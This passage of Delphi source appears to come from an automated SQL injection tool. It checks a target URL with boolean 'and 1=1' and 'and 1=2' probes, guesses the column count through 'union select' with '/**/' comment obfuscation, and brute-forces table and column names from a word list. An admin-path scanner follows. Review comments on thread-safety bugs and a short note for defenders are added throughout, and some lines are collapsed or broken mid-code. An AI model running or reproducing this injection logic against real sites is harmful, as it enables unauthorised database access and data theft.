try for i:=M to lsbDict.Count-1 do begin if scanManager.FreeOnTerminate then begin scanManager.Suspend; scanManager.Free; end; end; MM.Lines.Add(''''''''); MM.Lines.Add(''''后台路径猜解结束。。。''''); except end; } end;
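procedure TForm1.ListBox1Click(Sender: TObject);
begin
  // Show the list box's text in the embedded browser and switch to its tab.
  // Items.Text yields the same CRLF-joined content as Items.GetText but returns
  // a managed string; the original GetText call returned a PChar allocated with
  // StrAlloc that was never released with StrDispose, so every click leaked it.
  // NOTE(review): this navigates to the whole list text, not the clicked item —
  // confirm that is intended.
  wb.Navigate(ListBox1.Items.Text);
  pcPHPInj.ActivePageIndex := 3;
end;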
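procedure TForm1.FormShow(Sender: TObject);
begin
  // Create the status-bar progress bar once. OnShow fires every time the form
  // becomes visible, and the original unconditional Create leaked a fresh
  // TProgressBar on each show because it was owned by nil and never freed.
  if not Assigned(pg1) then
  begin
    pg1 := TProgressBar.Create(Self); // owned by the form, freed with it
    pg1.Parent := StatusBar1;
  end;
  // Re-apply the geometry each show so it tracks the status bar's current size.
  pg1.Height := StatusBar1.Height;
  pg1.Width := StatusBar1.Width;
  pg1.Visible := False;
end;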
end.
unit Unit2;
interface
uses Classes,StdCtrls,Windows,SysUtils,ComCtrls,IdHTTP;
var
  CS: TRTLCriticalSection; // global critical section shared by every scan thread in this unit
                           // NOTE(review): re-initialised by each thread constructor below

type
  // Base thread: checks that the target URL answers the probes and guesses the
  // column count of the injection point (see scanThread.Execute).
  scanThread = class(TThread)
  protected
    FUrl, InjUrl, FStr: string; // target URL; the probe URL under construction; select-list text supplied by the caller
    FKeyWord: string;           // a response containing this text counts as a hit (see Get)
    FState: boolean;            // loop-termination flag used by scanThread.Execute
    FMemo: TMemo;               // log output
    FListView: TListView;       // result list
    FNum: Integer;              // dictionary index used by scanFieldThread
    FTable, FValue: string;     // table name / current dictionary entry
    procedure Execute; override;
  public
    //constructor Create(Url,KeyWord:string;Memo:TMemo);
  end;

  // Guesses table names from the dictionary list box (one thread for the whole list).
  scanTableThread = class(scanThread)
  private
    procedure scanTableResult; // Synchronize target: appends one row to FListView
  protected
    procedure Execute; override;
  public
    constructor Create(Url, Str, KeyWord: String; Memo: TMemo; ListView: TListView);
  end;

  // Guesses column names; one instance per dictionary entry (Num).
  scanFieldThread = class(scanThread)
  private
    procedure scanFieldResult; // Synchronize target: appends one row to FListView
  protected
    procedure Execute; override;
  public
    constructor Create(Url, Str, KeyWord, Table: String; Num: integer; Memo: TMemo; ListView: TListView);
  end;

// HTTP GET of URL; True when the response is HTTP 200 and (Key is empty or Key
// occurs in the body). Exceptions are swallowed and yield False.
function Get(URL, Key: string): boolean;

var
  stoped: boolean; // polled by scanTableThread.Execute to abort its loop; presumably set from the form — not visible here
implementation
uses Unit1;
function Get(URL, Key: string): boolean;
var
  Http: TIdHTTP;
  Body: string;
  Matched: boolean;
begin
  // Fetch URL and report a hit: HTTP 200 alone when Key is empty, otherwise
  // HTTP 200 plus Key occurring somewhere in the response body (case-sensitive).
  // Any exception (connection failure, timeout, protocol error) is treated as
  // "no hit" — a deliberate best-effort contract kept from the original.
  Result := False;
  Http := TIdHTTP.Create(nil);
  try
    try
      Http.HandleRedirects := True; // must follow redirects, otherwise the request may fail
      Http.ReadTimeout := 30000;    // stop waiting after 30 s
      Body := Http.Get(URL);
      if Key = '' then
        Matched := True
      else
        Matched := Pos(Key, Body) > 0;
      Result := (Http.ResponseCode = 200) and Matched;
    except
      // swallowed on purpose: a failed probe simply reads as False
    end;
  finally
    Http.Free;
  end;
end;
{constructor scanThread.Create(Url,KeyWord:string;Memo:TMemo); begin FMemo :=Memo; FUrl :=Url; FKeyWord :=KeyWord; FreeOnTerminate := True; // 自动删除 inherited Create(False); // 直接运行 end;}
procedure scanThread.Execute;
var
  i: integer;
  iStr: string;
begin
  // Reads the target URL and match keyword from the form, verifies that the base
  // URL and two boolean probes all return HTTP 200 (Get with an empty key), then
  // grows a "select 1,2,...,i" list until Get finds the keyword or i exceeds 30.
  // The resulting column count is written back to the form's edit/spin controls.
  //
  // NOTE(review): FMemo.Lines.Add and the Form1.* writes below run on this worker
  // thread without Synchronize; the VCL is not thread-safe, so they should be
  // marshalled to the main thread the way scanTableResult is.
  //
  // Defender's note: the probe spelling (/**/ in place of spaces, a trailing /*)
  // is a classic inline-comment obfuscation. Request-log detection rules should
  // normalise /**/ to whitespace before matching "and 1=1" / "union select".
  FMemo := Form1.MM;
  FUrl := trim(Form1.EdtInjUrl.Text);
  FKeyWord := trim(Form1.EdtKey.Text);
  FMemo.Lines.Clear;
  FMemo.Lines.Add('正在检测注入点是否可用。。。'); // "checking whether the injection point is usable..."
  // All three probes must answer HTTP 200; the empty key makes Get ignore the body.
  if (not Get(FUrl, '')) or
     (not Get(FUrl + '/**/and/**/1=1/*', '')) or
     (not Get(FUrl + '/**/and/**/1=2/*', '')) then
  begin
    FMemo.Lines.Add('注入点不可用,猜解终止!'); // "injection point not usable, aborting"
    exit;
  end;
  // Guess the column count: extend the select list by one number per round.
  i := 1;
  iStr := '1';
  FState := False;
  FMemo.Lines.Add('');
  FMemo.Lines.Add('开始猜解字段数目。。。'); // "guessing the number of columns..."
  FMemo.Lines.Add('');
  while not FState do
  begin
    inc(i);
    if i > 30 then
    begin
      FMemo.Lines.Add('最大猜解字段数大于30,猜解终止!'); // "more than 30 columns, aborting"
      FState := True; // redundant: exit follows immediately
      exit;
    end;
    iStr := iStr + ',' + IntToStr(i);
    InjUrl := FUrl + '/**/and/**/1=1/**/union/**/select/**/' + iStr + '/*';
    FMemo.Lines.Add(InjUrl);
    if Get(InjUrl, FKeyWord) then
    begin
      FState := True;
      FMemo.Lines.Add('');
      FMemo.Lines.Add('字段数目猜解结束!共找到' + IntToStr(i) + '个字段。'); // "done: found i columns"
      // Publish the count to the form's field-count edit and spin-edit bounds.
      Form1.EdtFieldNum.Text := IntToStr(i);
      Form1.spNum.MaxValue := i;
      Form1.spNum.Text := IntToStr(i);
      Form1.spField1.MaxValue := i;
      Form1.spField2.MaxValue := i;
      exit;
    end;
  end;
end;
constructor scanTableThread.Create(Url, Str, KeyWord: String; Memo: TMemo; ListView: TListView);
begin
  // Store the caller's parameters, then start the thread immediately
  // (CreateSuspended = False).
  FListView := ListView;
  FMemo := Memo;
  FUrl := Url;
  FKeyWord := KeyWord;
  FStr := Str;
  FreeOnTerminate := True; // the thread frees itself once Execute returns
  // NOTE(review): CS is a unit-global critical section. Initialising it from every
  // constructor resets it while another scan thread may still hold it, and nothing
  // ever calls DeleteCriticalSection. Initialise it once (e.g. in the unit's
  // initialization section) instead.
  InitializeCriticalSection(CS);
  //inherited Create(FUrl,FKeyWord,FMemo); // run immediately
  inherited Create(False);
end;
procedure scanTableThread.scanTableResult;
var
  Row: TListItem;
begin
  // Runs via Synchronize from Execute: appends one row to the result list,
  // captioned with its 1-based position and carrying FValue as the first sub-item.
  Row := FListView.Items.Add;
  Row.Caption := IntToStr(FListView.Items.Count);
  Row.SubItems.Add(FValue);
end;
// Table-name guessing, done entirely inside one thread.
procedure scanTableThread.Execute;
var
  i: integer;
begin
  // Walks every entry of Form1.lsbDict (presumably a word list), builds one probe
  // URL per entry with FStr as the select list and the entry as the FROM target,
  // and records entries for which Get finds FKeyWord in the response.
  //
  // NOTE(review): the `stoped` early exit inside the loop returns without calling
  // LeaveCriticalSection(CS), so any thread that enters CS afterwards blocks for
  // good; both exit paths should share one cleanup.
  // NOTE(review): pg1.*, FMemo.Lines.Add and Form1.lsbDict are VCL objects touched
  // directly from this worker thread; only the list-view update goes through
  // Synchronize.
  stoped := False;
  with Form1 do
  begin
    pg1.Min := 0;
    pg1.Max := Form1.lsbDict.Count;
    pg1.Step := 1;
    pg1.Position := 0;
    pg1.Visible := true;
  end;
  EnterCriticalSection(cs); // enter critical section
  FMemo.Lines.Add('');
  FMemo.Lines.Add('开始猜解表段。。。'); // "guessing table names..."
  FMemo.Lines.Add('');
  for i := 0 to Form1.lsbDict.Count - 1 do
  begin
    if stoped then
    begin
      FMemo.Lines.Add('');
      FMemo.Lines.Add('表段猜解结束。。。'); // "table guessing finished..."
      Form1.pg1.Visible := False;
      exit; // see NOTE above: CS is still held here
    end;
    FValue := Form1.lsbDict.Items; // NOTE(review): an index ([i]) appears to have been lost in extraction — compare scanFieldThread.Execute
    if FValue = '' then Continue;
    InjUrl := FUrl + '/**/and/**/1=1/**/union/**/select/**/' + FStr + '/**/from/**/' + FValue + '/*';
    FMemo.Lines.Add(InjUrl);
    Form1.pg1.StepIt;
    if Get(InjUrl, FKeyWord) then
    begin
      Synchronize(scanTableResult); // list-view update must run on the main thread
    end;
  end;
  FMemo.Lines.Add('');
  FMemo.Lines.Add('表段猜解结束。。。'); // "table guessing finished..."
  Form1.pg1.Visible := False;
  LeaveCriticalSection(CS); // leave critical section
  sleep(20); // original comment: "thread suspended"
end;
// Several of these threads are created to guess column names, one per dictionary entry.
constructor scanFieldThread.Create(Url, Str, KeyWord, Table: String; Num: integer; Memo: TMemo; ListView: TListView);
begin
  // Store the caller's parameters, then start the thread immediately
  // (CreateSuspended = False).
  FListView := ListView;
  FMemo := Memo;
  FUrl := Url;
  FKeyWord := KeyWord;
  FStr := Str;
  FTable := Table;
  FNum := Num;
  FreeOnTerminate := True; // the thread frees itself once Execute returns
  // NOTE(review): CS is a unit-global critical section. Because many
  // scanFieldThread instances are created back to back, each constructor
  // re-initialises CS while earlier threads may already hold it, and nothing ever
  // calls DeleteCriticalSection. Initialise it once (unit initialization) instead.
  InitializeCriticalSection(CS);
  //inherited Create(FUrl,FKeyWord,FMemo); // run immediately
  inherited Create(False);
end;
procedure scanFieldThread.scanFieldResult;
var
  Row: TListItem;
begin
  // Runs via Synchronize from Execute: appends one row to the result list,
  // captioned with its 1-based position and carrying FValue as the first sub-item.
  Row := FListView.Items.Add;
  Row.Caption := IntToStr(FListView.Items.Count);
  Row.SubItems.Add(FValue);
end;
procedure scanFieldThread.Execute;
var
  i: integer;
  TmpStr: string;
begin
  // One thread per dictionary entry (index FNum): substitutes the entry for the
  // &FIELDNAME& placeholder in FStr, probes FTable with the result, and records a
  // hit via scanFieldResult. CS serialises the memo write and the probe across
  // the concurrently created threads.
  // NOTE(review): `i` is declared but never used.
  FValue := Form1.lsbDict.Items[FNum];
  TmpStr := StringReplace(FStr, '&FIELDNAME&', FValue, [rfIgnoreCase]);
  InjUrl := FUrl + '/**/and/**/1=1/**/union/**/select/**/' + TmpStr + '/**/from/**/' + FTable + '/*';
  EnterCriticalSection(cs); // enter critical section
  FMemo.Lines.Add(InjUrl);
  if Get(InjUrl, FKeyWord) then
  begin
    Synchronize(scanFieldResult); // list-view update must run on the main thread
  end;
  LeaveCriticalSection(CS); // leave critical section
  sleep(20); // original comment: "thread suspended"
end;
end.
//后台管理扫描线程类 unit Unit3;
interface
uses Classes,StdCtrls,Windows,SysUtils,ComCtrls,wininet;
var
  CS: TRTLCriticalSection; // global critical section for this unit's scan threads
                           // NOTE(review): re-initialised by every scanManagerThread constructor

type
  // Worker thread for the "backend admin scan" named in the unit header comment;
  // its Execute and scanResult bodies are not visible here.
  scanManagerThread = class(TThread)
  private
    Tmplbx: TListBox;  // presumably receives results via scanResult — confirm in Execute
    TmpMemo: TMemo;    // presumably log output — confirm in Execute
    TmpNum: integer;
    TmpUrl: string;
    Str: string;
    procedure scanResult;
  protected
    procedure Execute; override;
  public
    constructor Create(Url: string; Num: integer; Lbx: TListBox; Memo: TMemo);
  end;
implementation
uses Unit1;
constructor scanManagerThread.Create(Url: string; Num: integer; Lbx: TListBox; Memo: TMemo);
begin
  // Keep the caller's arguments, then start immediately (CreateSuspended = False).
  TmpUrl := Url;
  TmpNum := Num; // pass parameters
  Tmplbx := Lbx;
  TmpMemo := Memo;
  FreeOnTerminate := True; // the thread frees itself once Execute returns
  // NOTE(review): CS is this unit's global critical section. Re-initialising it for
  // each new thread resets it while earlier threads may still hold it, and it is
  // never deleted. Initialise it once (unit initialization) instead.
  InitializeCriticalSection(CS);
  inherited Create(False); // run immediately
end;
//====================== 判断网址是否存在的函数 ======================= function CheckUrl(url: string; TimeOut: integer = 5000): boolean; var hSession, hfile, hRequest: hInternet; dwindex, dwcodelen: dword; dwcode: array[1..20] of char; res: pchar; re: integer; Err1: integer; j: integer; begin if pos(''''http://'''', lowercase(url)) = 0 then url := ''''http://'''' + url; Result := false; InternetSetOption(hSession, Internet_OPTION_CONNECT_TIMEOUT, @TimeOut, 4); hSession := InternetOpen(''''Mozilla/4.0'''', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0); //设置超时 if assigned(hsession) then begin j := 1; while true do begin hfile := InternetOpenUrl(hsession, pchar(url), nil, 0, INTERNET_FLAG_RELOAD, 0); if hfile = nil then begin j := j + 1; Err1 := GetLastError; if j > 5 then break; if (Err1 <> 12002) or (Err1 <> 12152) then break; sleep(2); end else begin